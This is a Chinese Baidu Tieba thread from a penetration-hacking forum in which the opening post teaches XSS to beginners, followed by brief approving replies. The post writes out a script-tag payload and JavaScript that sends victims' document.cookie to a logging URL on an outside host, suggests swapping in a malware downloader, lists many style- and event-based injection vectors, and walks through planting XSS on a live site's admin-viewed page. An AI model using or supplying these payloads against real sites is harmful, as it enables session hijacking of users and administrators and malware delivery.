网页资讯视频图片知道文库贴吧地图采购
进入贴吧全吧搜索

 
 
 
日一二三四五六
       
       
       
       
       
       

签到排名:今日本吧第个签到,

本吧因你更精彩,明天继续来努力!

本吧签到人数:0

一键签到
成为超级会员,使用一键签到
一键签到
本月漏签0次!
0
成为超级会员,赠送8张补签卡
如何使用?
点击日历上漏签日期,即可进行补签。
连续签到:天  累计签到:天
0
超级会员单次开通12个月以上,赠送连续签到卡3张
使用连续签到卡
05月15日漏签0天
渗透吧 关注:79,823贴子:614,194
  • 看贴

  • 图片

  • 吧主推荐

  • 游戏

  • 1 2 3 4 下一页 尾页
  • 55回复贴,共4页
  • ,跳到 页  
<<返回渗透吧
>0< 加载中...

科普入门xss,附带实战

  • 只看楼主
  • 收藏

  • 回复
  • 周周Z宝贝
  • 二年级
    5
该楼层疑似违规已被系统折叠 隐藏此楼查看此楼
XSS跨站脚本攻击的基本原理和SQL
注入攻击类似(个人观点),都是利用系统执行了未经过滤的危险代码,不同点在于XSS是一种基于网页脚本的注入方式,也就是将脚本攻击载荷写入网页执行以达到对网页客户端访问用户攻击的目的,属于客户端攻击。而SQL注入攻击将危险代码绕过正常的文本输入变为可执行的SQL执行语句从而操纵数据库,从而进一步探测、操纵数据库信息。属于服务器攻击?(菜鸟看法)。
1、最常见的最经典的XSS bug检测语句必然是
<script>alert(/XSS/)</script> ①
比如在存在XSS bug的留言板上写上留言①,当访问留言板网页时会弹出对话框:
这表明我们输入的语句被原样写入的网页并被浏览器执行了.那么我们就有机会执行我们的脚本攻击载荷:
<script src = http://www.labsecurity.org/xssbug.js></script>
在我们的网络空间上的xssbug.js代码可以是
Var img = document.createElement(“img”);
Img.src = “http://www.labsecurity.org/log?”+escape(document.cookie);
document.body.appendChild(img);
如果我们如上代码顺利执行,那么被攻击者在目标网站的登录cookie就写进了log.得到其cookie后,进行浏览器重新发包就可以以被攻击者身份登录目标网站.(被攻击者可以是普通用户也可以使网站超级管理员).
将窃取cookie的代码换成下载者地址就可以将下载者下载到存在下载者攻击漏洞的用户电脑上.
也可以将代码换成目标用户在网站上的某些操作的 数据包脚本.促使在不知情的情况下”自愿”进行某些操作.
对于Cookie窃取的防御可以使IP绑定等方案了.
既然存在XSS攻击那么程序员在开发时必然会进行某些危险关键字的过滤,以及限制用户的输入长度.这样即使存在xss漏洞.Hack也只能检测,却不能够写入攻击载荷(长度限制啊).
2、利用IMG图片标记属性跨站
当然也可以像上面所说的在留言板中输入
<img src=”javacript:alert(/XSS/)”></img>
这所说的不是这样是在用户上传图片时将图片路径修改为一段可执行的XSS测试脚本.
如果存在XSS漏洞那么此类脚本就会被执行.这类脚本要闭合双引号”>”等.
利用DIV标签属性跨站
<div
style=”width:0;height:0;background:url(javascript:document.body.onload =
function(){alert(/XSS/);};”></div>
利用已知事件攻击
移动特效字<marquee>文字</marquee>
<marquee onstart=”alert(/XSS/)”>文字</marquee>
B.<div style=”” onmouseenter=”alert(/XSS/)”>文字</div>
构造事件
<img style=”#” style=”TEST:e-xpression(alert(/XSS/));”>
常用的事件构造
<font style = “TEST:e-xpression(alert(/XSS/))”></font>
<li style = “TEST:e-xpression(alert(/XSS/))”></li>
<table style = “TEST:e-xpression(alert(/XSS/))”></table>
<a style = “TEST:e-xpression(alert(/XSS/))”></a>
<b style = “TEST:e-xpression(alert(/XSS/))”></b>
<ul style = “TEST:e-xpression(alert(/XSS/))”></ul>
<marque tyle = “TEST:e-xpression(alert(/XSS/))”></marquee>
理论上 只要没有进行xss防范 过滤 任何站都存在xss 就看你要插的漂亮 插的灵活。这种方式只适用于IE 系列,并且在IE 7 及以上版本的浏览器会有安全提示。大把储存性xss等你挖。
---------------------------------------------------------------------------------

我们在域名后缀加上ziliao.asp或者tianxieziliao.asp都行




到了这一步,看了那么多的文章,视频,剩下的你们会X了吧?特地写给新手看的,就继续写下去吧。
这里面有很多处都是可以X的,只要没过滤都行,我们就在地址那里写吧。


漫长的等待

我们登陆后台

红色的框就是我们XSS代码


  • 小小飞鱼88
  • 初二年级
    11
该楼层疑似违规已被系统折叠 隐藏此楼查看此楼
学习了。


2026-05-15 10:30:03
广告
不感兴趣
开通SVIP免广告
  • Triumph_Lee
  • 高二年级
    14
该楼层疑似违规已被系统折叠 隐藏此楼查看此楼
前排。


  • bogeqianfuzhe
  • 五年级
    8
该楼层疑似违规已被系统折叠 隐藏此楼查看此楼
好东西,必须顶起来,


  • 考古队小伙
  • 学前班
    3
该楼层疑似违规已被系统折叠 隐藏此楼查看此楼
马


  • zwm1314great
  • 五年级
    8
该楼层疑似违规已被系统折叠 隐藏此楼查看此楼
顶一个。。


  • 沈洁
  • 幼儿园
    2
该楼层疑似违规已被系统折叠 隐藏此楼查看此楼
马可


  • 温柔的孤鹰
  • 托儿所
    1
该楼层疑似违规已被系统折叠 隐藏此楼查看此楼
感谢黑阔。


2026-05-15 10:24:03
广告
不感兴趣
开通SVIP免广告
  • 北核
  • 四年级
    7
该楼层疑似违规已被系统折叠 隐藏此楼查看此楼
还真没玩过xss


  • 七星小坏
  • 初二年级
    11
该楼层疑似违规已被系统折叠 隐藏此楼查看此楼
新人来学习。。。


  • 贴吧用户_0RJ37AE
  • 四年级
    7
该楼层疑似违规已被系统折叠 隐藏此楼查看此楼
学习了


  • Blacker_Net
  • 三年级
    6
该楼层疑似违规已被系统折叠 隐藏此楼查看此楼
马


  • 只得二十
  • 学前班
    3
该楼层疑似违规已被系统折叠 隐藏此楼查看此楼
求发到你邮箱的 asp代码


  • 夏与蝉鸣
  • 五年级
    8
该楼层疑似违规已被系统折叠 隐藏此楼查看此楼
XSS也有很多种类。可以分持久型和非持久。或者说反射型XSS(非持久),存储型XSS


登录百度账号

扫二维码下载贴吧客户端

下载贴吧APP
看高清直播、视频!
  • 贴吧页面意见反馈
  • 违规贴吧举报反馈通道
  • 贴吧违规信息处理公示
  • 1 2 3 4 下一页 尾页
  • 55回复贴,共4页
  • ,跳到 页  
<<返回渗透吧
分享到:
©2026 Baidu贴吧协议|隐私政策|吧主制度|意见反馈|网络谣言警示